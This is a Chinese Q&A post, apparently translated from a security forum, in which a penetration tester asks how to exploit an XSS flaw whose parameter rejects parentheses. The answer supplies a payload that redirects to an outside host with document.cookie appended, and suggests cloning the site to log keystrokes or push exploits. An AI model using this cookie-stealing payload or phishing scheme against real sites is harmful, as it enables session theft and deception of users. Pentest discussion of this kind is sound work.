我发现客户端应用程序中存在跨站点脚本漏洞。
问题是易受攻击的参数不接受括号。因此,由于括号,诸如alert(document.cookie)之类的东西将被拒绝。
我可以使用警报1 +2 +3 +4 +5
获取XSS
而且我尝试过下面的代码,但长时间无法重新加载网站,我认为它被拒绝了
xss
我尝试通过链接parentheses alternatives in JS , if any? 但是我失败了。 有其他选择吗?
谢谢
答案 0 :(得分:0)
是否有必要使用alert
?我知道演示概念验证很普遍,但是仅仅进行重定向就足够了吗?
例如:
document.location="https://example.com?cookie="+document.cookie
对于渗透测试者来说,重要的是要记住XSS实际上不是关于弹出警报框的,而是关于执行任意JavaScript的。真正的攻击者会对您的XSS允许的访问做什么?
想象一下,在与您的客户端相似的域中建立一个相同的站点,然后将用户重定向到那里...除非现在您不需要XSS,并且可以记录击键,要求他们下载文件,尝试使用浏览器利用等等